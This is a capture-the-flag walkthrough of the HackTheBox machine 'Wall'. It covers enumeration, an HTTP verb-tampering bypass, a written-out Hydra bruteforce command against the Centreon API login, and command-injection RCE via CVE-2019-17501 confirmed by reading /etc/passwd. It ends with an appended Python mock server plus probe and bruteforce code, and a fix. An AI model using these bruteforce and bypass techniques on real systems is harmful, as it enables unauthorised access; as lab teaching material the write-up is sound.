Today we are going to crack a machine called Wall. This is a Capture the Flag type of challenge. Let's get cracking!!

Penetration Testing Methodology

- Network scanning (Nmap)
- Directory bruteforce (DirBuster)
- Bypass Authentication using Verb Tampering
- Bruteforce the Centreon API login (Hydra)
- Exploit CVE-2019-17501 for RCE

To attack any machine, we need its IP address. Machines hosted on HackTheBox have a static IP address. Now that we have the IP address, we need to enumerate the open ports on the machine. For this, we will be running an nmap scan. To get the most information fast, we ran the aggressive scan. The Nmap aggressive scan quickly gave us some great information: it reported that the following ports and services are running: 22 (SSH) and 80 (HTTP).

We ran the browser and opened the IP address of the machine. It gave us the default Debian "Apache2 is working" page.

It's time to do some directory bruteforce on our target. Generally we use the dirb tool, but let's show some love to DirBuster sometimes as well. Enter the target URL and locate the dictionary you want to use for the bruteforce. Here, in this case, we will be using medium.txt, which can be found in Kali Linux by default. After everything is set, just click Start and kick back.

After working for a while, it gave us one directory called monitoring, so we took a look at it. We entered the URL in the browser and we have ourselves a login panel. It does say "Protected area by the admin". After trying a bunch of bruteforce techniques, we were not able to get through this login panel. Now, all we have to do is get through this panel. That's when it hit us: we should try HTTP Verb Tampering.

So we fired up BurpSuite and captured the request to the /monitoring/ page. We observed that a GET request was being sent to the server. We decided to tamper with it and changed the method to POST. After making this change, we forwarded the request to the server. Verb Tampering worked and we were redirected to the /centreon/ page. This kind of bypass works when the server's access control is written for specific methods only, so a verb that is not on the list reaches the resource without ever being asked for credentials. How lucky! Now we need to bypass this as well.

We tried to bruteforce the Centreon login using BurpSuite but were unsuccessful. We then took a closer look at the page source and found a Centreon token that was preventing us from brute-forcing. So we ran a directory bruteforce on this page and decided to bruteforce the API for the credentials instead. We looked for the Centreon API documentation to find the query that can be brute-forced. In the API documentation, we are told to send a POST request to the API. When we did so, we got the message "Bad Credentials". So we gained enough information for crafting a bruteforce query.

We crafted this query to bruteforce with the Hydra tool:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.157 http-post-form "/centreon/api/index.php?action=authenticate:username=^USER^&password=^PASS^:Bad Credentials" -V

Here we started by giving the username "admin", which we got from the initial login panel. Then we provided the wordlist for the bruteforce. Then we provided the type of authentication panel, which is "http-post-form", followed by the URL, the username and password parameters, and the response text that can be used to differentiate valid from invalid credentials.

Now, this panel which we got was not something we are used to working with every day. But being in the penetration testing business, we make sure to check out the CVEs for any panel, software or CMS. We did our research and found CVE-2019-17501, a command injection in Centreon's poller configuration that needs an authenticated session, which is why the credentials mattered. There was a GitHub link mentioned in the description of this CVE. On a closer look, the PoC contained a path. We entered "cat /etc/passwd" here to check if RCE was working. After entering the command we hit the blue Play button (highlighted in the image).
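The two checks above, verb tampering against /monitoring/ and the Hydra-style http-post-form loop against the authenticate endpoint, as an added example that is not code from the original walkthrough or from Centreon. The target is a local mock server constructed for the demo: it assumes the protected area only enforces Basic auth on GET/HEAD (the classic `<Limit GET>` mistake, which the post does not confirm was the cause on the real box), that the API answers "Bad Credentials" on a miss as the post describes, and the password "hunter2", the token value and the wordlist are made up.

```python
"""Added example (not from the post): mock of the two weaknesses the
walkthrough exploits, plus the client-side checks for them. Assumed and
constructed: auth on GET/HEAD only for /monitoring/, the "Bad Credentials"
failure string, the credentials admin/hunter2 and the wordlist."""
import json
import threading
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode, urlparse

VALID_USER, VALID_PASS = "admin", "hunter2"  # assumed, not from the box
WORDLIST = ["password", "123456", "centreon", "hunter2", "letmein"]  # constructed


class Target(BaseHTTPRequestHandler):
    def _protected(self):
        # Access control written for GET (and HEAD, as Apache treats it) only:
        # every other verb falls straight through to the redirect.
        if self.command in ("GET", "HEAD") and not self.headers.get("Authorization"):
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="Protected area by the admin"')
            self.end_headers()
            return
        self.send_response(302)  # what the post saw after switching to POST
        self.send_header("Location", "/centreon/")
        self.end_headers()

    def _authenticate(self):
        length = int(self.headers.get("Content-Length", 0))
        form = parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        if (user, password) == (VALID_USER, VALID_PASS):
            code, body = 200, json.dumps({"authToken": "demo-token"})  # constructed
        else:
            code, body = 403, "Bad Credentials"
        self.send_response(code)
        self.end_headers()
        self.wfile.write(body.encode())

    def _route(self):
        path = urlparse(self.path).path
        if path == "/monitoring/":
            self._protected()
        elif path == "/centreon/api/index.php" and self.command == "POST":
            self._authenticate()
        else:
            self.send_response(404)
            self.end_headers()

    do_GET = do_HEAD = do_POST = do_OPTIONS = _route

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Serve the mock on an ephemeral loopback port; returns (server, port)."""
    srv = HTTPServer(("127.0.0.1", 0), Target)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def probe_verbs(port, path="/monitoring/", verbs=("GET", "HEAD", "POST", "OPTIONS")):
    """Verb-tampering check: replay the same request with each method and
    record the status. A path that answers 401 to GET but not to some other
    verb is a bypass candidate."""
    results = {}
    for verb in verbs:
        conn = HTTPConnection("127.0.0.1", port, timeout=5)
        conn.request(verb, path)
        resp = conn.getresponse()
        resp.read()
        results[verb] = resp.status
        conn.close()
    return results


def bruteforce(port, user, wordlist, failure="Bad Credentials"):
    """What the hydra http-post-form line does: POST each candidate and treat a
    response containing the failure string as a miss. Returns the first password
    whose response lacks that string (with the response), or (None, None)."""
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    for password in wordlist:
        conn = HTTPConnection("127.0.0.1", port, timeout=5)
        conn.request("POST", "/centreon/api/index.php?action=authenticate",
                     urlencode({"username": user, "password": password}), headers)
        resp = conn.getresponse()
        text = resp.read().decode()
        conn.close()
        if failure not in text:
            return password, text
    return None, None


if __name__ == "__main__":
    srv, port = start_server()
    print("verb probe on /monitoring/:", probe_verbs(port))
    print("hydra-style bruteforce:", bruteforce(port, "admin", WORDLIST))
    srv.shutdown()
```

Run it and the probe shows 401 for GET and HEAD but 302 for POST and OPTIONS, which is exactly the signal to look for with Burp's Repeater on a real target. The fix on the server side is to apply the auth directives to the whole location rather than wrapping them in a method-specific `<Limit>` block, so no verb slips past. The bruteforce loop also shows why the failure string matters in the Hydra line: Hydra only knows a guess failed because "Bad Credentials" appears in the body, so a response that changes wording (lockout page, rate-limit notice) would be reported as a hit and needs checking by hand.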